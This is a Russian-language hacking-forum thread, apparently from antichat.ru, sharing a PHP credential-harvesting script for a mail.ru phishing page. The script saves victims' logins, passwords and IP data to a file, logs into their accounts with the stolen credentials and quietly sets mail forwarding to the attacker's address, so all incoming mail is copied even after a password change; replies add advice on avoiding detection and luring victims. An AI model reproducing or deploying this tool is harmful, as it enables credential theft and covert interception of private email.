Собственно говоря навеянно темой http://forum.antichat.ru/thread130561.html Сидим ты с товарищем zifanchuck - общаемся по аське и обалдеваем со скорости с которой товарищи с mail.ru латают дыры ну и собственно говоря чтоб они не остались без работы решили с ним написать простенький скрипт. Это собственно говоря часть фейка обычный файл с названием log.php Давайте порассуждаем как нам продлить свое незаметное прибывание на ящике жертвы? И что б вы сделали в первую очередь еслиб заподозрили что на вашем почтовом ящике "завелась какаято бяка"? Ответ напрашиваеться сам собой- бежим менять пасс и контрольный вопрос на восстановлении пароля- логично? (именно поэтому эту часть мы трогать небудем) Ну а чтож тогда остаеться в Нашем распоряжении??? Скажете- ничего? Типа жертва сменила пасс и вопрос- и мы доступ потеряли? Да так могут сказать 99% пользователей, но почемуто мы всегда без внимания оставляем маленькую деталь- а именно мы можем прописать СВОЕ мыло в ящике жертвы....(а вы когда последний раз залазили в своем ящике в пересылку писем?), Я думаю что уже почти все догадались что просто в нашем фейке- мы пропишем свое мыло на которое хотим получать всю входящую почту жертвы . Оригинальнось этого способа что при удачном стечении обстоятельств мы читаем письма жертвы а они у нее остаються в ящике непрочтенными, для этого надо лиш к своему фейку прикрутить обыкновенный файлик log.php который мы с товарищем Zifanchuk нарисовали специально для пользователей antichat.ru в котором единственное надо прописать свое мыло которое мы прячем в ящике жертвы, ну а после того как жертва авторизируеться- бежать на свой ящик и делать подтверждение на привязку своего ящика к ящику жертвы и тихо-тихо без палива читать все входящие которые получит наша жертва, а вот собственно говоря сам скрипт PHP: <?php /** * @author Kusto & Zifanchuck * @copyright 2009 //Скрипт непретендует на оригинальность //Просто стараемся замаскироваться в ящике жертвы //был выложен на antichat.ru */ $Login = $_POST['login']; //Логин $Domain = $_POST['domain']; $Pass = $_POST['password']; // Пароль $ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы $Data = date("d-m-y H:i:s", time()); // Дата и время $Browser = getenv("HTTP_USER_AGENT"); $Port = getenv("REMOTE_PORT"); $Connect = $_SERVER['HTTP_CONNECTION']; $Host = gethostbyaddr(getenv("REMOTE_ADDR")); $Mymail='Наше мыло';//здесь записываем наше мыло на которое хотим получать письма с ящика жертвы в формате [email protected] $filelog = fopen("base.php","a+"); //открываем файл базы $text = "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip Мыло:$Login@$Domain Пасс:$Pass"; fwrite($filelog,"\n $text \n"); //записываем всё fclose($filelog); //закрываем function curl($url,$post) { $cfile = 'cookies.txt'; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile); curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile); curl_setopt($ch, CURLOPT_POST, 1); $result = curl_exec($ch); curl_close($ch); return $result; }; $result = curl('http://win.mail.ru/cgi-bin/auth', 'Login='.$Login.'&Domain='.$Domain.'&Password='.$Pass); $result = curl('http://win.mail.ru/cgi-bin/modifyfwd', 'modify=1&Username='.$Login.'&Forward='.$Mymail.'&oldPswd='.$Pass); echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://win.mail.ru/cgi-bin/auth?&Login=$Login&Domain=$Domain&Password=$Pass'></head></html>"; // кидаем пользователя в ящик ?> P.S. Еще раз напоминаю что работа не авторская а результат бреда бвух балбесов которые мирно болтали в асе и их осенило (я имел ввиду себя и Zifanchuck) P.S. S.Пользуясь случаем хочу передать привет работникам mail.ru и пожелать процветания их компании втечении долгих долгих лет, с Уважением Кусто
Просто фейк который сохраняет мыло пасс в base.php так-же сохраняет куки в файл а Самое главное прячет ВАШЕ мыло в ящике жертвы впоследствии на которое вы получаете все входящие письма предназначенные для вашей жертвы (вернее копии писем)- это надо для того чтоб например у жертвы стоит высокая безопасность и вы неможете зайти на ящик либо тут-же сменила жертва и пасс и вопрос (чтоб контроль над ящиком непотерять)
ну ок, идея все же не нова. и человек, ставящий такие высокие настройки безопасности, вряд ли поведется на фейк.
1.Я никогда невидел реализацию (ткните меня носом где вы это видели) 2.За мою долгую практику (как можете видеть из этой темы http://forum.antichat.ru/thread57658.html) Высокую безопасность ставят именно ламеры, а на фейк как ты выразился.... просто ты видел наверное пабликфейки и делаеш выводы о всех (я иногда сам теряюсь: фейк передо мной или нет) ()))
А еще чего интересного засунуть в мыло изнутри, чтоб копнуть поглубже? Мыслей хороших не возникало?))))))
тяжеловато будет кого на фейк закинуть, это вам не вконтакте.ру где можно пару букав изменить, а в мейл измени так сразу спалят )
Где ты такое увидел??? 0_о я думал уже майл снова что то пофиксил- нифига- настроил пересылку на яндекс- все чисто- никаких записей по поводу пересылки.....
Один кернет нихера не понял Вот я закатал скрипт на локалхост,закатал туда-же base.php, дальше я так понимаю нужен фейк мылару?)
Вот именно просто используеш эту страничку вместо существующей у тебя в фейке майла которую обычно обзывают log.php, однако на сегодняшний день как показал сатана-фу это вроде как неактуально, т к при входе они добавили запись что настроенна пересылка....и имя ящика Каптча я считаю вообще непроблемма- можно и контрольный вопросс менять и т д- просто каптчу надо вывести в тело письма и заставить жертву ее вводить самому (а что- так фейк даже убедительнее смотриться- майловская каптча в теле письма- которую майл просит ввести для того чтоб отличить спамбот пользуеться этим ящиком или человек )
Где ты такое увидел??? 0_о я думал уже майл снова что то пофиксил- нифига- настроил пересылку на яндекс- все чисто- никаких записей по поводу пересылки..... Ето если со своего компа заходишь то нет палива а если поставить галочку чужой комп !!!!! или там проксю то мммммда паливо